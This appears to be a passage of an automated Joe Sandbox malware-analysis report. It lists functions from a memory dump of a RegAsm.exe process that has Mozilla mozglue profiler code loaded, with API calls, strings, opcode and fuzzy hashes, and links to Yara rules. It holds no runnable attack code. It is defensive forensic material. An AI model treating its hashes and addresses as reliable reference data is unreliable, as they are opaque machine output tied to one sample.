                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CurrentInit_thread_footerTerminatestrlen
                                                                            • String ID: Details$name${marker.name} - {marker.data.name}
                                                                            • API String ID: 46770647-1733325692
                                                                            • Opcode ID: 995c73df8f6356d2ba5b30a447ffc2068d64873becc3a2df5529bf0a0407fe06
                                                                            • Instruction ID: a5891527008dc0ecd9b7240de715659ce99935eaf5326d9181fe0ebb85e390cb
                                                                            • Opcode Fuzzy Hash: 995c73df8f6356d2ba5b30a447ffc2068d64873becc3a2df5529bf0a0407fe06
                                                                            • Instruction Fuzzy Hash: E1710270A007469FCB04CF68D49079ABBB5FF85304F00466DD8195BB41EB71B6A8CBE1
                                                                            Function 6CC9B0C0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 188COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • free.MOZGLUE(?,?,6CC9B0A6,6CC9B0A6,?,6CC9AF67,?,00000010,?,6CC9AF67,?,00000010,00000000,?,?,6CC9AB1F), ref: 6CC9B1F2
                                                                            • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,6CC9B0A6,6CC9B0A6,?,6CC9AF67,?,00000010,?,6CC9AF67,?,00000010,00000000,?), ref: 6CC9B1FF
                                                                            • free.MOZGLUE(?,?,?,map/set<T> too long,?,?,6CC9B0A6,6CC9B0A6,?,6CC9AF67,?,00000010,?,6CC9AF67,?,00000010), ref: 6CC9B25F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: free$Xlength_error@std@@
                                                                            • String ID: map/set<T> too long
                                                                            • API String ID: 1922495194-1285458680
                                                                            • Opcode ID: 46755a798d489d960d1e51a683cd40ee1851beb90b7205f47c7e979d66bcea86
                                                                            • Instruction ID: dfdbc7fd8e3037973d1f0b87857b0ce1e35262c6bf458a2fb2f5787549ad38b3
                                                                            • Opcode Fuzzy Hash: 46755a798d489d960d1e51a683cd40ee1851beb90b7205f47c7e979d66bcea86
                                                                            • Instruction Fuzzy Hash: 66619B74604645AFDB11CF19C890A9ABBF1FF4A318F28C1A9D8598FB52E331EC45CB91
                                                                            Function 6CC5D468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6CC6CBE8: GetCurrentProcess.KERNEL32(?,6CC331A7), ref: 6CC6CBF1
                                                                              • Part of subcall function 6CC6CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC331A7), ref: 6CC6CBFA
                                                                            • EnterCriticalSection.KERNEL32(6CCBE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CC6D1C5), ref: 6CC5D4F2
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CC6D1C5), ref: 6CC5D50B
                                                                              • Part of subcall function 6CC3CFE0: EnterCriticalSection.KERNEL32(6CCBE784), ref: 6CC3CFF6
                                                                              • Part of subcall function 6CC3CFE0: LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC3D026
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CC6D1C5), ref: 6CC5D52E
                                                                            • EnterCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC5D690
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CC6D1C5), ref: 6CC5D751
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                            • String ID: MOZ_CRASH()
                                                                            • API String ID: 3805649505-2608361144
                                                                            • Opcode ID: 9324e62dece960d2490d874f64007249107d7a9f1e92cbd2ac88fad31ac84f05
                                                                            • Instruction ID: 0d1f7d30113175e48c008f9823ff459383209b486944bb581d9d8af081d69c90
                                                                            • Opcode Fuzzy Hash: 9324e62dece960d2490d874f64007249107d7a9f1e92cbd2ac88fad31ac84f05
                                                                            • Instruction Fuzzy Hash: CA510171A047018FD714CF69C2D021AB7F1EB89744FA44A2EE59AD7F84EB70E821CB85
                                                                            Function 6CC84630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: __aulldiv
                                                                            • String ID: -%llu$.$profiler-paused
                                                                            • API String ID: 3732870572-2661126502
                                                                            • Opcode ID: e50acc06b729fa1e0b1f2cc62a80a174153e63e6c25daee0ddadc92d981462c8
                                                                            • Instruction ID: ac55f1f030cb56c0be428795b31f8d0d60ac0c4f57ef4aaeee18c4939347482d
                                                                            • Opcode Fuzzy Hash: e50acc06b729fa1e0b1f2cc62a80a174153e63e6c25daee0ddadc92d981462c8
                                                                            • Instruction Fuzzy Hash: 28414771A056089FCB08DFB9E8A115FBBF9AF85748F11863EE845ABB41FB309805C741
                                                                            Function 6CCA9830 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6CCA985D
                                                                            • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6CCA987D
                                                                            • MOZ_CrashPrintf.MOZGLUE(ElementAt(aIndex = %zu, aLength = %zu),?,?), ref: 6CCA98DE
                                                                            Strings
                                                                            • ElementAt(aIndex = %zu, aLength = %zu), xrefs: 6CCA98D9
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Printf$Target@mozilla@@$?vprint@Crash
                                                                            • String ID: ElementAt(aIndex = %zu, aLength = %zu)
                                                                            • API String ID: 1778083764-3290996778
                                                                            • Opcode ID: ea83a8ddd7f29d2339ae01e4f3e1613e2749a6116391e8ee59b03d2a37edb080
                                                                            • Instruction ID: 006b3613d92437f6893f089e862bf9485d2b8e81337ec4b2c1f8080ea5bedf93
                                                                            • Opcode Fuzzy Hash: ea83a8ddd7f29d2339ae01e4f3e1613e2749a6116391e8ee59b03d2a37edb080
                                                                            • Instruction Fuzzy Hash: 2A313875B001086FDF04AF99D8545EF77B8DF89714F40442DEA0AABB40EB315905CBD1
                                                                            Function 6CC846E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __aulldiv.LIBCMT ref: 6CC84721
                                                                              • Part of subcall function 6CC34410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6CC73EBD,00000017,?,00000000,?,6CC73EBD,?,?,6CC342D2), ref: 6CC34444
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: __aulldiv__stdio_common_vsprintf
                                                                            • String ID: -%llu$.$profiler-paused
                                                                            • API String ID: 680628322-2661126502
                                                                            • Opcode ID: d1d6f89a7f23acc32b07ea59fd43b6308102e64b718f859a58da51ce8f91eece
                                                                            • Instruction ID: 5e48483350d0f2db4af953b6ae2c810f674d78901716a2086dd20c3926066b26
                                                                            • Opcode Fuzzy Hash: d1d6f89a7f23acc32b07ea59fd43b6308102e64b718f859a58da51ce8f91eece
                                                                            • Instruction Fuzzy Hash: 8E310A71F052185BCB08CFADD8A569E7FE69B89318F15453EE8059BB41F7749804CB50
                                                                            Function 6CC8B410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6CC34290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CC73EBD,6CC73EBD,00000000), ref: 6CC342A9
                                                                            • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6CC8B127), ref: 6CC8B463
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC8B4C9
                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6CC8B4E4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: _getpidstrlenstrncmptolower
                                                                            • String ID: pid:
                                                                            • API String ID: 1720406129-3403741246
                                                                            • Opcode ID: 578de043bc189f953e9b011d4b93cfa6e2a7c9c8b97ac8c6192858bebd1afd38
                                                                            • Instruction ID: 57451e8c32362852b8634e5dfd6271a92c7e209f7e3058e80370728dfe1efed8
                                                                            • Opcode Fuzzy Hash: 578de043bc189f953e9b011d4b93cfa6e2a7c9c8b97ac8c6192858bebd1afd38
                                                                            • Instruction Fuzzy Hash: 7231F231A026089BDB00DFA9DC91AAFBBB5FF8531CF540529D81167F41E732A849CBA1
                                                                            Function 6CC3F100 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(shell32,?,6CCAD020), ref: 6CC3F122
                                                                            • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CC3F132
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: SHGetKnownFolderPath$shell32
                                                                            • API String ID: 2574300362-1045111711
                                                                            • Opcode ID: 70fa9484117cb51a45423cebe4f3591ace7049156651dc0df6a9f63a18cbef9e
                                                                            • Instruction ID: 6884462eeae60bd6aa0a094928c0da316285fe0a0cec9e206e9f41e362a64d41
                                                                            • Opcode Fuzzy Hash: 70fa9484117cb51a45423cebe4f3591ace7049156651dc0df6a9f63a18cbef9e
                                                                            • Instruction Fuzzy Hash: 6A0171757002299FCB00CFB5ED98A5B7BB8FF4A654B400428F84DE7740E730AA04CBA0
                                                                            Function 6CC7E550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7E577
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7E584
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7E5DE
                                                                            • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CC7E8A6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
                                                                            • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                                            • API String ID: 1483687287-53385798
                                                                            • Opcode ID: f6009b2a5954c8774ac28983fc51b33b247420d649fbd0d0696e22931075282e
                                                                            • Instruction ID: 577bab60484d38b7f04b2a318214369104046de84ddfa8fd9d6983a66c206d8f
                                                                            • Opcode Fuzzy Hash: f6009b2a5954c8774ac28983fc51b33b247420d649fbd0d0696e22931075282e
                                                                            • Instruction Fuzzy Hash: DD11A13AA04258DFCB109F98C488A5AFBB4FB89728F01051DF84557B50E774A805CFA9
                                                                            Function 6CC42272 Relevance: 6.6, APIs: 5, Instructions: 360COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CC4237F
                                                                            • memcpy.VCRUNTIME140(?,?,00010000), ref: 6CC42B9C
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID:
                                                                            • API String ID: 3510742995-0
                                                                            • Opcode ID: dff4a001a7364da424bca914f656007289be280d92b3d128fb5c7eb14914976f
                                                                            • Instruction ID: c5d3ef6837749f8ee9d1c42e88c2e5d2555cfc8a258bbae81822480eee0e25ab
                                                                            • Opcode Fuzzy Hash: dff4a001a7364da424bca914f656007289be280d92b3d128fb5c7eb14914976f
                                                                            • Instruction Fuzzy Hash: 96E17F71A002069FDB18CF59C8A5B9EBBB2FF88314F19C168E9059B705E771EC85CB90
                                                                            Function 6CC80C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC80CD5
                                                                              • Part of subcall function 6CC6F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CC6F9A7
                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC80D40
                                                                            • free.MOZGLUE ref: 6CC80DCB
                                                                              • Part of subcall function 6CC55E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC55EDB
                                                                              • Part of subcall function 6CC55E90: memset.VCRUNTIME140(6CC97765,000000E5,55CCCCCC), ref: 6CC55F27
                                                                              • Part of subcall function 6CC55E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC55FB2
                                                                            • free.MOZGLUE ref: 6CC80DDD
                                                                            • free.MOZGLUE ref: 6CC80DF2
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                            • String ID:
                                                                            • API String ID: 4069420150-0
                                                                            • Opcode ID: 52e6067700eda5f2aa6d35be30d7c2f8a70680f54f450037c0986779ab37e4d1
                                                                            • Instruction ID: 1e4f297e14a28ca1f40f06ba4412f32bc7906c2847d014c800c1c5831b5ae8d6
                                                                            • Opcode Fuzzy Hash: 52e6067700eda5f2aa6d35be30d7c2f8a70680f54f450037c0986779ab37e4d1
                                                                            • Instruction Fuzzy Hash: A3411A71A0A7848BD320CF29C08079BFBE5BFC5758F518A2EE8D887751E770A445CB82
                                                                            Function 6CC89120 Relevance: 6.3, APIs: 5, Instructions: 98COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6CC88242,?,00000000,?,6CC7B63F), ref: 6CC89188
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6CC88242,?,00000000,?,6CC7B63F), ref: 6CC891BB
                                                                            • memcpy.VCRUNTIME140(00000000,00000008,0000000F,?,?,6CC88242,?,00000000,?,6CC7B63F), ref: 6CC891EB
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6CC88242,?,00000000,?,6CC7B63F), ref: 6CC89200
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6CC88242,?,00000000,?,6CC7B63F), ref: 6CC89219
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: malloc$freememcpy
                                                                            • String ID:
                                                                            • API String ID: 4259248891-0
                                                                            • Opcode ID: 46d658c4b1401590674064279a9e234a3f272a1e83916575f426acd31b50fcc0
                                                                            • Instruction ID: 8b41134abba98de3cf885b5e4cfe73071342bdde8114cefd964a6e3430bd0adb
                                                                            • Opcode Fuzzy Hash: 46d658c4b1401590674064279a9e234a3f272a1e83916575f426acd31b50fcc0
                                                                            • Instruction Fuzzy Hash: FF310031A026058BEB00DFA8DC4476BBBB9EB81319F514629D856D7650FB31E805CBA1
                                                                            Function 6CC70800 Relevance: 6.3, APIs: 5, Instructions: 71COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC70838
                                                                            • memset.VCRUNTIME140(?,00000000,00000158), ref: 6CC7084C
                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CC708AF
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 6CC708BD
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC708D5
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeave$memset
                                                                            • String ID:
                                                                            • API String ID: 837921583-0
                                                                            • Opcode ID: b008cfe4aa988087f58539c963e756330ae642052d592b022067e3c10c3a95fb
                                                                            • Instruction ID: 39ae6008f9ed7643583171aabc7496a9dcfe919a6608b4cbc146cc0712fa0887
                                                                            • Opcode Fuzzy Hash: b008cfe4aa988087f58539c963e756330ae642052d592b022067e3c10c3a95fb
                                                                            • Instruction Fuzzy Hash: FB21D3307002498BDF148FA5D899BAA73B9FF44708F50056CE509E7B41EF36A404CBE4
                                                                            Function 6CC8CCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6CC7DA31,00100000,?,?,00000000,?), ref: 6CC8CDA4
                                                                              • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                              • Part of subcall function 6CC8D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6CC8CDBA,00100000,?,00000000,?,6CC7DA31,00100000,?,?,00000000,?), ref: 6CC8D158
                                                                              • Part of subcall function 6CC8D130: InitializeConditionVariable.KERNEL32(00000098,?,6CC8CDBA,00100000,?,00000000,?,6CC7DA31,00100000,?,?,00000000,?), ref: 6CC8D177
                                                                            • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6CC7DA31,00100000,?,?,00000000,?), ref: 6CC8CDC4
                                                                              • Part of subcall function 6CC87480: ReleaseSRWLockExclusive.KERNEL32(?,6CC915FC,?,?,?,?,6CC915FC,?), ref: 6CC874EB
                                                                            • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6CC7DA31,00100000,?,?,00000000,?), ref: 6CC8CECC
                                                                              • Part of subcall function 6CC4CA10: mozalloc_abort.MOZGLUE(?), ref: 6CC4CAA2
                                                                              • Part of subcall function 6CC7CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6CC8CEEA,?,?,?,?,00000000,?,6CC7DA31,00100000,?,?,00000000), ref: 6CC7CB57
                                                                              • Part of subcall function 6CC7CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6CC7CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6CC8CEEA,?,?), ref: 6CC7CBAF
                                                                            • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6CC7DA31,00100000,?,?,00000000,?), ref: 6CC8D058
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                            • String ID:
                                                                            • API String ID: 861561044-0
                                                                            • Opcode ID: 8c6d7a02d2532c262ac8904df474afb1b115183d4ed9a3890b872f5202e081f8
                                                                            • Instruction ID: a4b3047f5ab0d4354d2a3f650595aede65e562d1021fb61ae604fd739148466b
                                                                            • Opcode Fuzzy Hash: 8c6d7a02d2532c262ac8904df474afb1b115183d4ed9a3890b872f5202e081f8
                                                                            • Instruction Fuzzy Hash: 51D16071A05B469FD708CF28C480B9AFBF1BF89308F01876DD95987711EB71A9A5CB81
                                                                            Function 6CC41720 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CC417B2
                                                                            • memset.VCRUNTIME140(?,00000000,?,?), ref: 6CC418EE
                                                                            • free.MOZGLUE(?), ref: 6CC41911
                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC4194C
                                                                            Memory Dump Source
